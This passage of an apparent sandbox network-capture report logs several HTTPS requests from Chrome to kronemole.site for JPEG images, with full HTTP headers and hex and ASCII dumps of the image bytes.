                                                                          2023-11-21 16:58:41 UTC642INData Raw: 47 2d 91 24 95 c2 38 60 17 e0 60 a2 c9 bb d4 a8 ad 68 ff 03 af 32 7b 3e 67 e7 d3 42 75 c3 44 49 cd b7 35 b1 49 45 55 c2 ab d5 8a f4 de d6 00 4b 6a db e4 5e 90 8e 07 f6 f4 8d 8e 24 95 ca d1 c0 af 88 06 a6 52 23 06 00 cb 56 f0 ba ef cb e1 39 4d 45 cc 98 90 a4 ee 18 4a cc cc ae 42 78 f5 19 b0 06 f0 58 91 4e da 00 4b 6a 5b 47 9f a8 fe 03 b8 cc 32 49 52 a9 dc 0c 2c 0e 3c 68 29 d4 a0 2a ce fc b9 83 fc ed ca dc 42 cc 98 98 c5 5b 52 52 17 0d a9 ff 4c af 52 78 f5 48 d1 4e dc 00 4b 6a 5b 23 4b 02 f6 ad 3f f9 25 49 e5 f1 26 b0 32 31 23 6b bc e5 50 07 86 12 3b e1 55 c9 07 c0 9d 39 3c af 16 e0 40 6f 49 49 5d b0 3a b0 1d d5 08 af be 04 d6 05 1e 2e e2 c9 1b 60 49 5d 7f 6e bc 0b 1c 63 a9 24 a9 74 c6 12 3d b1 96 06 1e b7 1c 9a 8c 19 ea f7 49 d5 9c 9b d3 f3 1a 08 0c f2 b6
                                                                          Data Ascii: G-$8``h2{>gBuDI5IEUKj^$R#V9MEJBxXNKj[G2IR,<h)*B[RRLRxHNKj[#K?%I&21#kP;U9<@oII]:.`I]nc$t=I
                                                                          2023-11-21 16:58:41 UTC643INData Raw: 78 35 0e d8 9a f8 a0 aa b2 0c b0 a4 74 fc 81 e8 99 23 49 ca c6 ac c0 06 13 fd 7e 45 e0 49 e0 08 60 aa 92 5f fb 2b c0 4e 44 90 75 16 f1 09 ae 9a cf 19 58 3f f4 34 70 60 8e cf af 05 98 07 38 c8 a1 92 0a e9 64 62 c7 de aa 84 57 97 55 7d c0 0d b0 a4 74 7c 01 1c 60 19 24 29 33 db 02 53 4e f2 67 53 02 87 00 4f 01 ab 54 a0 06 6f 00 3b 03 3f 07 9e f1 96 68 ba 3e 96 a0 4d a7 92 ef 66 e9 2d c0 2f 80 f5 1d 2a a9 50 4e 26 3e 98 a9 42 78 b5 0d 70 a9 43 6e 80 25 a5 e9 52 e0 41 cb 20 49 99 bc de f9 ed 64 fe ff 7c 44 af a8 4b 80 d9 2a 50 8f 27 80 a5 80 33 bc 35 9a ca 9d 39 db 36 01 f8 0d f9 9e 89 de 52 7f 83 b8 90 c3 25 15 c2 71 54 23 bc 1a 4f 7c 00 77 89 43 fe dd 0b 3a 49 e9 bd 80 db b3 fe 83 48 92 94 9e 35 81 9f 36 f0 7d 9b 13 4d de 0f e7 87 b3 b5 ca e6 1b 60 57 e0 28
                                                                          Data Ascii: x5t#I~EI`_+NDuX?4p`8dbWU}t|`$)3SNgSOTo;?h>Mf-/*PN&>BxpCn%RA Id|DK*P'3596R%qT#O|wC:IH56}M`W(
                                                                          2023-11-21 16:58:41 UTC644INData Raw: 43 34 10 9f 0a e8 4b f4 db 9a 89 98 15 b2 18 11 8c 4d eb ed 98 a8 f1 c4 ac 36 35 d7 a5 c0 c2 c0 01 39 3f cf 21 c0 58 a2 cf dd 28 87 4d ea 50 95 96 0d 0e c3 c9 09 4d 65 80 25 e5 cf 38 e2 53 f7 7b 2c 85 94 5b ab d6 bf d4 be 95 81 bf a5 7c bc f9 4b 5a cb 1e 44 d3 f7 79 bc ad 72 e9 19 e0 53 cb 90 88 83 80 b9 81 4d 73 7e 9e 43 89 fe 5d db 10 61 96 a4 b6 55 29 bc 3a 9e d8 b4 45 4d e4 12 42 29 9f ee 05 ae b5 0c 92 d4 b0 9d 2c 81 32 32 dc 12 24 66 02 31 2b fd 1f 05 38 d7 cd 81 73 1c 32 a9 5d 55 ea 79 75 02 b0 9f 43 de 7c 06 58 52 7e ed 45 fe 1b 98 4a 52 1e cc 4e f4 a2 91 b2 f0 80 25 48 d4 57 f5 e7 f7 cb 05 38 d7 59 89 56 10 92 be 6f 18 d5 e9 79 75 22 b0 af 43 9e 0c 03 2c 29 bf de 20 d2 7b 49 d2 e4 fd 06 98 c2 32 28 03 e3 81 bb 2d 43 e2 3e 24 76 d0 1c 95 f3 f3 6c
                                                                          Data Ascii: C4KM659?!X(MPMe%8S{,[|KZDyrSMs~C]aU):EMB),22$f1+8s2]UyuC|XR~EJRN%HW8YVoyu"C,) {I2(-C>$vl
                                                                          2023-11-21 16:58:41 UTC646INData Raw: e6 04 d6 b1 0c ca e0 df d4 ad 80 51 96 a2 74 ee 07 7e 05 7c 53 90 f3 dd 9c 98 89 d5 db a1 53 c2 e6 01 4e 25 36 13 a8 82 db 30 bc 2a 1c 03 2c a9 5c 86 03 97 5b 06 49 25 b2 03 d0 cb 32 28 65 7f 04 ee b5 0c a5 75 17 d1 ef a6 28 cd 9a 37 27 7a 62 49 49 19 08 9c 4c 75 76 fb bd bd 7e ad df 38 f4 c5 62 80 25 b5 ad c8 b3 98 f6 03 be 70 08 25 95 c0 14 c4 ee 83 52 9a 1e 03 0e b3 0c a5 77 7d fd e7 cb f8 82 9c ef 2c c0 45 b8 9c 50 cd b7 10 70 1c 30 a4 22 d7 7b 07 b1 94 f8 6b 87 be 78 0c b0 a4 b6 15 39 c0 7a 0b 38 c6 21 94 54 02 eb 01 fd 2c 83 52 f4 11 b1 a4 c4 5d 07 ab e1 62 60 8f 82 9c 6b 0b b0 25 70 01 d0 d7 a1 53 93 2c 55 7f df 30 a4 22 d7 7b 67 fd 5a 0d af 0a ca 00 4b 6a 5b d1 fb 48 9d 00 bc e4 30 4a 2a b8 9d 2c 81 52 f4 2d b0 01 f0 1f 4b 51 29 7f a2 58 33 ee 36
                                                                          Data Ascii: Qt~|SSN%60*,\[I%2(eu(7'zbIILuv~8b%p%Rw},EPp0"{kx9z8!T,R]b`k%pS,U0"{gZKj[H0J*,R-KQ)X36
                                                                          2023-11-21 16:58:41 UTC647INData Raw: 77 08 0b 63 6d 60 5f aa b3 d3 20 c4 0c db 95 eb cf 33 55 9c 01 96 a4 8b 81 87 2d 83 a4 92 18 0f dc 48 7c 42 bd 0c 70 35 30 d6 b2 94 ca b7 c0 b1 c0 a2 c0 5d 96 43 39 51 c4 10 0b 60 23 e0 0c 60 a0 43 98 7b db 02 3b 51 ad f0 ea 05 60 25 e0 5d 87 5f 60 80 25 b5 67 42 c5 ae 75 d7 fa 9b 3e 49 2a 93 47 eb 6f ce e6 01 86 01 6f 59 92 c2 7b 00 58 02 38 10 18 6d 39 94 33 ef 01 ab d5 df 74 17 c9 10 e0 78 60 69 87 30 b7 f6 04 d6 a3 5a e1 d5 73 c0 8a 18 5e 69 22 06 58 52 db 26 54 ec 7a 9f 20 fa 20 48 52 19 bd 05 1c 4e 6c 37 be 1a 31 2b 6b 9c 65 29 94 17 89 30 f2 97 c0 33 96 43 39 f6 36 31 03 f4 e9 82 9d f7 60 e0 10 60 7d 87 30 77 86 11 7d d6 aa 14 5e bd 58 ff f7 da 65 83 fa 1e 03 2c a9 6d 13 2a 78 cd 07 00 9f 3a f4 92 4a 6c 3c 70 37 11 84 0c 04 8e 00 5e b7 2c b9 f6 2e
                                                                          Data Ascii: wcm`_ 3U-H|Bp50]C9Q`#`C{;Q`%]_`%gBu>I*GooY{X8m93tx`i0Zs^i"XR&Tz HRNl71+ke)03C961``}0w}^Xe,m*x:Jl<p7^,.
                                                                          2023-11-21 16:58:41 UTC648INData Raw: 4b 0d 18 45 ec 50 f8 7e 85 c7 70 67 60 2d aa 19 5e bd 4f cc bc 7a d6 a7 b2 9a c9 00 4b 92 4a c2 00 4b 92 a4 52 59 19 b8 81 d8 a0 a1 88 6e 20 96 43 de 5b c1 b1 1b 06 2c 41 35 c3 ab 0f ea f7 ee 33 3e 85 d5 6c 06 58 92 54 12 06 58 92 24 95 ce cf 80 db 80 99 0b 7a fe 35 e0 5a e0 c2 8a 8c 57 4f e0 0c a2 17 58 55 c3 ab 55 80 a7 7d ea 2a 09 06 58 92 54 12 06 58 92 24 95 d2 c2 c0 1d c0 ff 14 f4 fc 6b c0 93 c0 21 25 1f a7 d9 81 13 81 4d 2a 7a 9f 7e 02 ac 0a 8c f0 29 ab a4 f4 b4 04 92 24 49 92 94 5b cf 02 cb 03 23 0b 7a fe 2d c0 e2 c0 25 c4 cc a4 32 5a 8a 98 79 55 e5 f0 6a 35 0c af 94 30 67 60 49 52 49 38 03 4b 92 a4 52 eb 47 cc c4 5a ac c0 d7 50 03 2e 00 ae 2b d1 b8 6c 06 6c 4a 35 97 0c 42 34 ec 5f 0d 78 dc a7 a8 92 66 80 25 49 25 61 80 25 49 52 e9 cd 48 84 40 83
                                                                          Data Ascii: KEP~pg`-^OzKJKRYn C[,A53>lXTX$z5ZWOXUU}*XTX$k!%M*z~)$I[#z-%2ZyUj50g`IRI8KRGZP.+llJ5B4_xf%I%a%IRH@
                                                                          2023-11-21 16:58:41 UTC650INData Raw: 2c b0 1b 70 76 83 df df 07 b8 0a f8 55 12 2f 05 81 9d 3b 71 2e 52 e1 38 03 4b 92 24 49 92 d4 19 6f 10 8d ca ff 54 e1 1a 7c 0c ac 46 e7 02 a3 d6 99 58 cd 5e 4e 38 1e f8 2d 86 57 2a 39 67 60 49 52 49 38 03 4b 92 24 65 60 3d e0 02 e0 47 15 ba e6 17 88 59 54 2f 74 f1 ef 4f 41 cc 60 5b af 19 2f 01 81 5d 81 33 bd 15 55 76 ce c0 92 24 49 92 24 75 d5 f5 c0 d2 c0 d3 15 b9 de 5b 81 65 e8 7a 78 05 f0 2d b0 31 d1 f8 bd 3b 0c af 54 29 06 58 92 24 49 92 a4 ee 78 91 e8 87 55 e6 9d ef 26 00 47 12 4d ec 3f 6d c2 e3 7d 0b 6c 02 5c db 8d f3 31 bc 52 a5 b8 84 50 92 ca f2 aa ca 25 84 92 24 29 7b 1b 02 e7 00 33 96 e8 9a be 06 b6 07 2e 4d e0 b1 7b 01 17 01 bf ee cc cb 3e 60 0f e0 74 6f 37 55 89 01 96 24 95 84 01 96 24 49 ca 89 b9 89 d9 58 cb 97 e0 5a de 04 86 00 4f 24 78 8c 5e
                                                                          Data Ascii: ,pvU/;q.R8K$IoT|FX^N8-W*9g`IRI8K$e`=GYT/tOA`[/]3Uv$I$u[ezx-1;T)X$IxU&GM?m}l\1RP%$){3.M{>`to7U$$IXZO$x^


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.449759104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:41 UTC477OUTGET /fim/3079-US/edcfe56a4c763bb53fec401fa03a135a.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC563INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1763
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:48:21 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ovwCF9DNkkmwGgldasDMYR9TGYNri9nhsZn9%2FX4grNo9wxSjvy%2B98QU2Yn4fAydmxX4PdI8J7oxf7sPZVux0MqYLy1VvSMH78uveesmKBL8HUWZg1Od0by4mZgXpjJlIeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a97b8a4828d-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:41 UTC564INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 1f 43 6f 6d 70 72 65 73 73 65 64 20 62 79 20 6a 70 65 67 2d 72 65 63 6f 6d 70 72 65 73 73 ff db 00 84 00 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c 01 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c ff c2 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 04 07 06 08 03 05 00 01 09 02 ff da 00 08 01 01 00 00 00 00 7f b0 7c cc e0 d7 de 18
                                                                          Data Ascii: JFIFCompressed by jpeg-recompress""*%%*424DD\""*%%*424DD\22"|
                                                                          2023-11-21 16:58:41 UTC564INData Raw: 3f 4d 3a b1 94 03 2d 83 86 ef 24 a4 14 23 68 e1 4d 44 0e 3f 98 6a 62 3b 41 52 1b b7 17 ab 11 39 a5 08 2c af 18 8b 41 69 20 f9 40 e6 2b 46 7e 1d aa 62 7e bb 7c df 25 30 a7 b4 4c d2 46 75 a4 9b 30 e2 55 db ca f4 fc 31 9f 20 da 4c ca c7 bc 8a 06 b1 e2 f1 84 a3 84 1c 0a 7d eb be 40 40 86 ab 2a 5d 20 57 d6 da 60 15 97 5b 98 b1 53 1f 0f b1 50 5a f0 02 20 f9 71 32 d1 8a 2b 33 37 37 97 91 34 43 ad 2b 3a b1 ec 65 a6 5c 4e 42 7d 67 ec dc 23 ac c5 66 a8 39 5e d0 a2 49 2e 35 15 4f e2 5c 30 c9 20 5a 59 43 7e ad a0 6b a8 8a 66 17 85 e8 5f b0 b6 e2 3b 30 a1 14 c5 9b 65 9e 3c 55 23 0d 6e 64 d1 d2 0b 4f 6d c3 76 14 cf 53 82 66 28 48 32 d2 a1 56 81 c5 63 e3 6f e5 8f 6a 26 d7 2c 65 76 6c a1 e7 9c 37 92 8e 71 a4 d1 a3 b5 2f 74 ab 47 e9 51 35 84 07 cd bf 11 92 b3 ce 52 93 7f
                                                                          Data Ascii: ?M:-$#hMD?jb;AR9,Ai @+F~b~|%0LFu0U1 L}@@*] W`[SPZ q2+3774C+:e\NB}g#f9^I.5O\0 ZYC~kf_;0e<U#ndOmvSf(H2Vcoj&,evl7q/tGQ5R


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.449761104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:41 UTC663OUTGET /fim/3079-US/5ab79569e48f195b913682012875bbbd.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC664INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 2066
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:48:52 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c4%2FDVEOXCDoJvjkHk6eM3G0rekTs6aT3%2Fb91gOjsv0xAu9MVd3YLy5MzH5te1q5nonoPAG%2FvR5NWdH%2BE537OGe8dG6Nmn76D7YkIJXcik51PkU2%2B7qODEUEzXSVOrVic5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a9aa90d3b2c-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:41 UTC665INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:41 UTC665INData Raw: 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 35 37 44 45 32 37 34 38 42 38 30 31 31 45 44 39 42 43 45 42 39 43 41 45 33 35 44 30 41 33 33 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 35 37 44 45 32 37 35 38 42 38 30 31 31 45 44 39 42 43 45 42 39 43 41 45 33 35 44 30 41 33 33 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 35 37 44 45 32 37 32 38 42 38 30 31 31 45 44 39 42 43 45 42 39 43 41 45 33 35 44 30 41 33 33 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 35 37 44 45 32 37 33 38 42 38 30 31 31 45 44 39 42 43 45 42 39 43 41 45 33 35 44 30 41
                                                                          Data Ascii: mpMM:InstanceID="xmp.iid:457DE2748B8011ED9BCEB9CAE35D0A33" xmpMM:DocumentID="xmp.did:457DE2758B8011ED9BCEB9CAE35D0A33"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:457DE2728B8011ED9BCEB9CAE35D0A33" stRef:documentID="xmp.did:457DE2738B8011ED9BCEB9CAE35D0A
                                                                          2023-11-21 16:58:41 UTC667INData Raw: 00 6d 09 8c 35 97 c4 75 64 66 49 09 02 5b 41 02 36 96 1a fc 66 0c 69 c3 ba 52 7d 66 97 dc 72 ec dc b0 42 6c 8e 62 79 70 d9 8c 11 47 ca fd 84 4f c0 9b 7b e6 ae bf f3 6a f3 39 11 75 df 74 50 f4 ef fc 85 47 91 7a af bb 67 cc 7a f7 41 04 4d 97 e3 ca 51 99 87 11 ce 3c d4 7e 69 1c 9e 5e de 6b c7 97 f8 71 ec 8d 7d 6b f6 a5 f9 9f a3 8f b5 04 11 af f6 6e 80 9f 5e f9 02 e7 ee 42 fe 55 71 e5 37 47 de 8e e6 b8 0e 1c be d4 10 46 9c 4f 0e 73 46 0b 1a 7f 66 08 20 86 c1 9f ff d9
                                                                          Data Ascii: m5udfI[A6fiR}frBlbypGO{j9utPGzgzAMQ<~i^kq}kn^BUq7GFOsFf


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.449760104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:41 UTC663OUTGET /fim/3079-US/bc3bfbb60dc61c1d954c5dd8cb68cfc0.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC667INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 2029
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:47:42 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKKG0tWGgFCG80xQaCJGJoYdYESt2UGnATQhLYzBv%2FvWuecMWwLXXrjcrZ1M2NXwjmLAU7rh4%2FXsJ12CpLeFuTzrB3icsLeC4rzJKQFp79e0JoY3qBxsXEzi0nLYrLo7Hg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a9a9cf73b2f-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:41 UTC668INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:41 UTC668INData Raw: 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 38 38 32 42 42 39 32 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 38 38 32 42 42 39 33 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 38 38 32 42 42 39 30 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 38 38 32 42 42 39 31 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46 22 2f 3e 20
                                                                          Data Ascii: nstanceID="xmp.iid:7882BB928B7F11EDA59CA9172A53E6CF" xmpMM:DocumentID="xmp.did:7882BB938B7F11EDA59CA9172A53E6CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7882BB908B7F11EDA59CA9172A53E6CF" stRef:documentID="xmp.did:7882BB918B7F11EDA59CA9172A53E6CF"/>
                                                                          2023-11-21 16:58:41 UTC670INData Raw: 5f 6c ae b1 28 ec 39 c3 ee 8c fd 5d 14 54 cf 99 73 f0 ff 00 37 f4 d1 4a 47 69 c7 1c eb 35 e7 c6 8a 2a 83 1b ed 9f ec 9f 37 bb e3 7f 8e a8 6e 39 c6 cf c2 ff 00 a7 3e ff 00 e5 fe a5 14 50 fe 55 f2 57 8f f9 df dd 7d 46 76 bf 0d 8f ec ca cb d3 e1 fe af de f2 5a 97 db bc 38 59 77 55 97 f0 d1 45 25 b5 fd 83 8b e3 c9 f8 14 a8 a2 8a 52 27 ff d9
                                                                          Data Ascii: _l(9]Ts7JGi5*7n9>PUW}FvZ8YwUE%R'


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.449765172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:42 UTC670OUTGET /fim/3079-US/edcfe56a4c763bb53fec401fa03a135a.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:43 UTC680INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:43 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1763
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:43 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:48:21 GMT
